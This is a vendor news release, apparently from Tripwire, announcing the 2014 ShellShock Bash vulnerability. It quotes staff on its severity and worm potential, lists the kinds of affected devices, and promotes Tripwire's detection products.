Only a few months after the Heartbleed fiasco, yet another Internet security disaster comes to light, bringing panic and concern to an immense population of Bash software users.
The ShellShock vulnerability (CVE-2014-6271) affects Unix, Linux, BSD, OS X and other Unix derivatives and was announced on September 24, 2014, by Akamai security researcher Stephane Chazelas.
“This vulnerability is more severe than Heartbleed,” said Lamar Bailey, director of Tripwire’s Vulnerability and Exposure Research Team (VERT). “If an attacker is successful, he or she can take complete control of the target system. Unfortunately, this is one of the rare vulnerabilities with the potential to be a wide-scale worm because it is extremely easy to exploit and there are millions of vulnerable targets.”
The Bash shell processes commands for controlling Unix and Unix derivative operating systems. Attackers can exploit a vulnerability in Bash to take complete control of targeted systems by passing commands that execute arbitrary code. This additional code can be used to load malware, delete content and steal data. In addition, security experts warn that this bug is “wormable” – a self-propagating condition that allows malware to spread rapidly from system to system without human intervention.
Unix and Unix derivative operating systems are used in a wide variety of consumer and networking products, as well as many other devices found across the enterprise, including:
- Tablets and smartphones
- VOIP equipment
- Badge sensors
- Firewalls, routers and switches
- Printers, 3D printers and scanners
- ‘Smart home’ appliances including HVAC controllers and other smart appliances
- Smart TVs, video projectors and cameras
- Smart meters for energy
- Industrial controllers
- Point of sale devices and handheld barcode scanners
- Wearable devices including Google Glass, smart watches and health monitors.
Since ShellShock can affect so many different devices, and because there are many applications that expose Bash, quickly finding and remediating this critical vulnerability across multiple machines can be a daunting task.
All Tripwire vulnerability management products, including IP360, and PureCloud, provide authenticated and unauthenticated checks for Bash. Tripwire Enterprise also provides coverage for Bash ShellShock using custom rules and policies.
“Despite Heartbleed, it is rare for a vulnerability to be both as extensive and severe as the Bash bug,” said Tim Erlin, director of IT security and risk strategy for Tripwire.
“This vulnerability has been around for a very long time, making the discovery of all the vulnerable systems on an enterprise network very challenging. Bash itself isn’t directly surfaced on the network, so you need to check potentially vulnerable systems, including many devices that are difficult or impossible to patch.”